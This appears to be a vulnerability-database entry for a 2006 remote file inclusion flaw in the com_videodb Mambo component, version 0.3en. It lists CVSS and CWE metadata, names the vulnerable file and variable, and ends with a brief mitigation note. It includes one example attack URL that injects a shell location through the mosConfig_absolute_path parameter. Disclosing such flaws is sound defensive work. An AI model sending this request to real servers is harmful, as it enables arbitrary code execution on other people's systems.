vendor:
Mambo Component
by:
h4ntu
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: Mambo Component
Affected Version From: 0.3en
Affected Version To: 0.3en
Patch Exists: NO
Related CWE: N/A
CPE: a:mambochina:mambo_component:com_videodb
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
com_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability
A remote include vulnerability was found in the com_videodb Mambo Component version 0.3en. The bug was found in the file core/videodb.class.xml.php, which contains a global variable $mosConfig_absolute_path. An attacker can exploit this vulnerability by sending a malicious request to the server, such as http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell], which can allow the attacker to execute arbitrary code on the server.
Mitigation:
Ensure that all user-supplied input is properly validated and sanitized before being used in any system operations.